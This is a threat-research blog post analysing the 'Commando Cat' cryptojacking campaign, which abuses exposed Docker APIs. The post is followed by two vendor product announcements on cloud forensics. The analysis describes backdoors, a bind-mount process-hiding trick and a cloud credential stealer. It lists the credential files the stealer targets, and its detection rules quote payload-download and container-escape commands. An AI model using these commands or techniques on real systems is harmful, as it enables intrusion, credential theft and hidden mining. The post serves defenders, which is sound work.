Blog
/
/
January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
02
Jan 2024

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando cat

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet by the IP 45[.]9.148.193 (which is the same as C2). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.” 

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Figure 1: Container with custom command to execute

It uses the chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • Dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear - this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Figure 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is that they will rename these binaries to evade detection, likely the attacker is anticipating that this box was previously infected by a campaign that renamed the binaries to this, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2, this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Figure 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH key into the root user’s authorized_keys file:

function make_ssh_backdoor
Figure 4

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile variable to a local variable named “$hidden_authorized_keys”, however this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely as an attempt to appear as legitimate. To continue this theme, the attacker also has opted to set the login shell for the “games” user as /usr/bin/nologin. This is not the path for the real nologin binary, and is instead a copy of bash placed here by the malware. This makes the “games” user appear as a regular service account, while actually being a backdoor.

Games user
Figure 5

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Figure 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].
The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, to then connect to the infected machine.

Script
Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Figure 9

This script works by cloning the Linux mtab file (a list of the active mounts) to another directory. It then creates a new bind mount for the /proc/pid directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/pid directory to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. It’s purpose is likely for acting as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way - in order for nodes to find each other, they use their shared secret instead of IP address using the  service. This permits gs-netcat to function in virtually every environment as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victims IP and hostname:

Script
Figure 10

This is more acceptable than tsh from a security point of view, there are 4 billion possible IP addresses and many more possible hostnames, making a brute force harder, although still possible by using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly to note, the attacker will use the cmd.cat containers to untar the downloaded payload, if tar is not available on the system or fails. Instead of using /tmp, it also uses /dev/shm instead, which acts as a temporary file store, but memory backed instead. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. This also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor - a high-profile Linux campaign [6].

Script
Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however not all systems use systemd, resulting in this payload being rendered entirely ineffective on these systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as IMDS, and environment variables. Interestingly, the script creates a file so that once the script runs the first time, it can never be run again as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as making the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7.] However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber script. Firstly, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script taking a long time to run on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so can be rendered ineffective by enforcing IMDSv2.

Script
Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, are then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Figure 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their name, and the results appended to a temporary file, before the final concatenation of the credentials files is read back into the CSOF variable.

CSOF variable
Figure 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads out their environment variables into CSOF. This is interesting as the payload already checks the environment variables in a lot of cases, such as in the aws, google, and azure grabbers. So, it is unclear why they grab all data, but then grab specific portions of the data again.

Code
Figure 19

Regardless of what data it has already grabbed, get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber, where it checks for the existence of a variable and then appends its contents (or the file’s contents if the variable is path) to CSOF.

Code
Figure 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. Firstly, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command that contains chroot (which is the initial command used by this payload).

Code
Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops & disables the services. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying their own miner, so that they aren't competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm .

Code
Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Figure 25

Next, it blackholes the docker registry by writing it's hostname to /etc/hosts with an IP of 0.0.0.0

Code
Figure 26

This completely blocks other attackers from pulling their images/tools onto the box, eliminating the risk of competition. Keeping the Alpine image named as docker/firstrun allows the attacker to still use the docker API to spawn an alpine box they can use to break back in, as it is already downloaded so the blackhole has no effect.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 
meta: 

        description = "Detects CommandoCat aws.sh credential stealer script" 
 
        license = "Apache License 2.0" 
 
        date = "2024-01-25" 
 
        hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 
    strings: 
 
        // Constants 

        $const1 = "CRED_FILE_NAMES" 
 
        $const2 = "MIXED_CREDFILES" 
 
        $const3 = "AWS_CREDS_FILES" 
 
        $const4 = "GCLOUD_CREDS_FILES" 
 
        $const5 = "AZURE_CREDS_FILES" 
 
        $const6 = "VICOIP" 
 
        $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

/

September 25, 2025

Announcing Unified Real-Time CDR and Automated Investigations to Transform Cloud Security Operations

Default blog imageDefault blog image

Fragmented Tools are Failing SOC Teams in the Cloud Era

The cloud has transformed how businesses operate, reshaping everything from infrastructure to application delivery. But cloud security has not kept pace. Most tools still rely on traditional models of logging, policy enforcement, and posture management; approaches that provide surface-level visibility but lack the depth to detect or investigate active attacks.

Meanwhile, attackers are exploiting vulnerabilities, delivering cloud-native exploits, and moving laterally in ways that posture management alone cannot catch fast enough. Critical evidence is often missed, and alerts lack the forensic depth SOC analysts need to separate noise from true risk. As a result, organizations remain exposed: research shows that nearly nine in ten organizations have suffered a critical cloud breach despite investing in existing security tools [1].

SOC teams are left buried in alerts without actionable context, while ephemeral workloads like containers and serverless functions vanish before evidence can be preserved. Point tools for logging or forensics only add complexity, with 82% of organizations using multiple platforms to investigate cloud incidents [2].

The result is a broken security model: posture tools surface risks but don’t connect them to active attacker behaviors, while investigation tools are too slow and fragmented to provide timely clarity. Security teams are left reactive, juggling multiple point solutions and still missing critical signals. What’s needed is a unified approach that combines real-time detection and response for active threats with automated investigation and cloud posture management in a single workflow.

Just as security teams once had to evolve beyond basic firewalls and antivirus into network and endpoint detection, response, and forensics, cloud security now requires its own next era: one that unifies detection, response, and investigation at the speed and scale of the cloud.

A Powerful Combination: Real-Time CDR + Automated Cloud Forensics

Darktrace / CLOUD now uniquely unites detection, investigation, and response into one workflow, powered by Self-Learning AI. This means every alert, from any tool in your stack, can instantly become actionable evidence and a complete investigation in minutes.

With this release, Darktrace / CLOUD delivers a more holistic approach to cloud defense, uniting real-time detection, response, and investigation with proactive risk reduction. The result is a single solution that helps security teams stay ahead of attackers while reducing complexity and blind spots.

  • Automated Cloud Forensic Investigations: Instantly capture and analyze volatile evidence from cloud assets, reducing investigation times from days to minutes and eliminating blind spots
  • Enhanced Cloud-Native Threat Detection: Detect advanced attacker behaviors such as lateral movement, privilege escalation, and command-and-control in real time
  • Enhanced Live Cloud Topology Mapping: Gain continuous insight into cloud environments, including ephemeral workloads, with live topology views that simplify investigations and expose anomalous activity
  • Agentless Scanning for Proactive Risk Reduction: Continuously monitor for misconfigurations, vulnerabilities, and risky exposures to reduce attack surface and stop threats before they escalate.

Automated Cloud Forensic Investigations

Darktrace / CLOUD now includes capabilities introduced with Darktrace / Forensic Acquisition & Investigation, triggering automated forensic acquisition the moment a threat is detected. This ensures ephemeral evidence, from disks and memory to containers and serverless workloads can be preserved instantly and analyzed in minutes, not days. The integration unites detection, response, and forensic investigation in a way that eliminates blind spots and reduces manual effort.

Figure 1: Easily view Forensic Investigation of a cloud resource within the Darktrace / CLOUD architecture map

Enhanced Cloud-Native Threat Detection

Darktrace / CLOUD strengthens its real-time behavioral detection to expose early attacker behaviors that logs alone cannot reveal. Enhanced cloud-native detection capabilities include:

• Reconnaissance & Discovery – Detects enumeration and probing activity post-compromise.

• Privilege Escalation via Role Assumption – Identifies suspicious attempts to gain elevated access.

• Malicious Compute Resource Usage – Flags threats such as crypto mining or spam operations.

These enhancements ensure active attacks are detected earlier, before adversaries can escalate or move laterally through cloud environments.

Figure 2: Cyber AI Analyst summary of anomalous behavior for privilege escalation and establishing persistence.

Enhanced Live Cloud Topology Mapping

New enhancements to live topology provide real-time mapping of cloud environments, attacker movement, and anomalous behavior. This dynamic visibility helps SOC teams quickly understand complex environments, trace attack paths, and prioritize response. By integrating with Darktrace / Proactive Exposure Management (PEM), these insights extend beyond the cloud, offering a unified view of risks across networks, endpoints, SaaS, and identity — giving teams the context needed to act with confidence.

Figure 3: Enhanced live topology maps unify visibility across architectures, identities, network connections and more.

Agentless Scanning for Proactive Risk Reduction

Darktrace / CLOUD now introduces agentless scanning to uncover malware and vulnerabilities in cloud assets without impacting performance. This lightweight, non-disruptive approach provides deep visibility into cloud workloads and surfaces risks before attackers can exploit them. By continuously monitoring for misconfigurations and exposures, the solution strengthens posture management and reduces attack surface across hybrid and multi-cloud environments.

Figure 4: Agentless scanning of cloud assets reveals vulnerabilities, which are prioritized by severity.

Together, these capabilities move cloud security operations from reactive to proactive, empowering security teams to detect novel threats in real time, reduce exposures before they are exploited, and accelerate investigations with forensic depth. The result is faster triage, shorter MTTR, and reduced business risk — all delivered in a single, AI-native solution built for hybrid and multi-cloud environments.

Accelerating the Evolution of Cloud Security

Cloud security has long been fragmented, forcing teams to stitch together posture tools, log-based monitoring, and external forensics to get even partial coverage. With this release, Darktrace / CLOUD delivers a holistic, unified approach that covers every stage of the cloud lifecycle, from proactive posture management and risk identification to real-time detection, to automated investigation and response.

By bringing these capabilities together in a single AI-native solution, Darktrace is advancing cloud security beyond incremental change and setting a new standard for how organizations protect their hybrid and multi-cloud environments.

With Darktrace / CLOUD, security teams finally gain end-to-end visibility, response, and investigation at the speed of the cloud, transforming cloud defense from fragmented and reactive to unified and proactive.

[related-resource]

Sources: [1], [2] Darktrace Report: Organizations Require a New Approach to Handle Investigations in the Cloud

Continue reading
About the author
Adam Stevens
Senior Director of Product, Cloud | Darktrace

Blog

/

/

September 25, 2025

Introducing the Industry’s First Truly Automated Cloud Forensics Solution

Default blog imageDefault blog image

Why Cloud Investigations Fail Today

Cloud investigations have become one of the hardest problems in modern cybersecurity. Traditional DFIR tools were built for static, on-prem environments, rather than dynamic and highly scalable cloud environments, containing ephemeral workloads that disappear in minutes. SOC analysts are flooded with cloud security alerts with one-third lacking actionable data to confirm or dismiss a threat[1], while DFIR teams waste 3-5 days requesting access and performing manual collection, or relying on external responders.

These delays leave organizations vulnerable. Research shows that nearly 90% of organizations suffer some level of damage before they can fully investigate and contain a cloud incident [2]. The result is a broken model: alerts are closed without a complete understanding of the threat due to a lack of visibility and control, investigations drag on, and attackers retain the upper hand.

For SOC teams, the challenge is scale and clarity. Analysts are inundated with alerts but lack the forensic depth to quickly distinguish real threats from noise. Manual triage wastes valuable time, creates alert fatigue, and often forces teams to escalate or dismiss incidents without confidence — leaving adversaries with room to maneuver.

For DFIR teams, the challenge is depth and speed. Traditional forensics tools were built for static, on-premises environments and cannot keep pace with ephemeral workloads that vanish in minutes. Investigators are left chasing snapshots, requesting access from cloud teams, or depending on external responders, leading to blind spots and delayed response.

That’s why we built Darktrace / Forensic Acquisition & Investigation, the first automated forensic solution designed specifically for the speed, scale, and complexities of the cloud. It addresses both sets of challenges by combining automated forensic evidence capture, attacker timeline reconstruction, and cross-cloud scale. The solution empowers SOC analysts with instant clarity and DFIR teams with forensic depth, all in minutes, not days. By leveraging the very nature of the cloud, Darktrace makes these advanced capabilities accessible to security teams of all sizes, regardless of expertise or resources.

Introducing Automated Forensics at the Speed and Scale of Cloud

Darktrace / Forensic Acquisition & Investigation transforms cloud investigations by capturing, processing, and analyzing forensic evidence of cloud workloads, instantly, even from time-restricted ephemeral resources. Triggered by a detection from any cloud security tool, the entire process is automated, providing accurate root cause analysis and deep insights into attacker behavior in minutes rather than days or weeks. SOC and DFIR teams no longer have to rely on manual processes, snapshots, or external responders, they can now leverage the scale and elasticity of the cloud to accelerate triage and investigations.

Seamless Integration with Existing Detection Tools

Darktrace / Forensic Acquisition & Investigation does not require customers to replace their detection stack. Instead, it integrates with cloud-native providers, XDR platforms, and SIEM/SOAR tools, automatically initiating forensic capture whenever an alert is raised. This means teams can continue leveraging their existing investments while gaining the forensic depth required to validate alerts, confirm root cause, and accelerate response.

Most importantly, the solution is natively integrated with Darktrace / CLOUD, turning real-time detections of novel attacker behaviors into full forensic investigations instantly. When Darktrace / CLOUD identifies suspicious activity such as lateral movement, privilege escalation, or abnormal usage of compute resources, Darktrace / Forensic Acquisition & Investigation automatically preserves the underlying forensic evidence before it disappears. This seamless workflow unites detection, response, and investigation in a way that eliminates gaps, accelerates triage, and gives teams confidence that every critical cloud alert can be investigated to completion.

Figure 1: Integration with Darktrace / CLOUD – this example is showing the ability to pivot into the forensic investigation associated with a compromised cloud asset

Automated Evidence Collection Across Hybrid and Multi-Cloud

The solution provides automated forensic acquisition across AWS, Microsoft Azure, GCP, and on-prem environments. It supports both full volume capture, creating a bit-by-bit copy of an entire storage device for the most comprehensive preservation of evidence, and triage collection, which prioritizes speed by gathering only the most essential forensic artifacts such as process data, logs, network connections, and open file contents. This flexibility allows teams to strike the right balance between speed and depth depending on the investigation at hand.

Figure 2: Ability to acquire forensic data from Cloud, SaaS and on-prem environments

Automated Investigations, Root Cause Analysis and Attacker Timelines

Once evidence is collected, Darktrace applies automation to reconstruct attacker activity into a unified timeline. This includes correlating commands, files, lateral movement, and network activity into a single investigative view enriched with custom threat intelligence such as IOCs. Detailed investigation reporting including an investigation summary, an overview of the attacker timeline, and key events. Analysts can pivot into detailed views such as the filesystem view, traversing directories or inspecting file content, or filter and search using faceted options to quickly narrow the scope of an investigation.

Figure 3: Automated Investigation view surfacing the most significant attacker activity, which is contextualized with Alarm information

Forensics for Containers and Ephemeral Assets

Investigating containers and serverless workloads has historically been one of the hardest challenges for DFIR teams, as these assets often disappear before evidence can be preserved. Darktrace / Forensic Acquisition & Investigation captures forensic evidence across managed Kubernetes cloud services, even from distroless or no-shell containers, AWS ECS and other environments, ensuring that ephemeral activity is no longer a blind spot. For hybrid organizations, this extends to on-premises Kubernetes and OpenShift deployments, bringing consistency across environments.

Figure 4: Container investigations – this example is showing the ability to capture containers from managed Kubernetes cloud services

SaaS Log Collection for Modern Investigations

Beyond infrastructure-level data, the solution collects logs from SaaS providers such as Microsoft 365, Entra ID, and Google Workspace. This enables investigations into common attack types like business email compromise (BEC), account takeover (ATO), and insider threats — giving teams visibility into both infrastructure-level and SaaS-driven compromise from a single platform.

Figure 5: Ability to import logs from SaaS providers including Microsoft 365, Entra ID, and Google Workspace

Proactive Vulnerability and Malware Discovery

Finally, the solution surfaces risk proactively with vulnerability and malware discovery for Linux-based cloud resources. Vulnerabilities are presented in a searchable table and correlated with the attacker timeline, enabling teams to quickly understand not just which packages are exposed, but whether they have been targeted or exploited in the context of an incident.

Figure 6: Vulnerability data with pivot points into the attacker timeline

Cloud-Native Scale and Performance

Darktrace / Forensic Acquisition & Investigation uses a cloud-native parallel processing architecture that spins up compute resources on demand, ensuring that investigations run at scale without bottlenecks. Detailed reporting and summaries are automatically generated, giving teams a clear record of the investigation process and supporting compliance, litigation readiness, and executive reporting needs.

Scalable and Flexible Deployment Options

Every organization has different requirements for speed, control, and integration. Darktrace / Forensic Acquisition & Investigation is designed to meet those needs with two flexible deployment models.

  • Self-Hosted Virtual Appliance delivers deep integration and control across hybrid environments, preserving forensic data for compliance and litigation while scaling to the largest enterprise investigations.
  • SaaS-Delivered Deployment provides fast time-to-value out of the box, enabling automated forensic response without requiring deep cloud expertise or heavy setup.

Both models are built to scale across regions and accounts, ensuring organizations of any size can achieve rapid value and adapt the solution to their unique operational and compliance needs. This flexibility makes advanced cloud forensics accessible to every security team — whether they are optimizing for speed, integration depth, or regulatory alignment

Delivering Advanced Cloud Forensics for Every Team

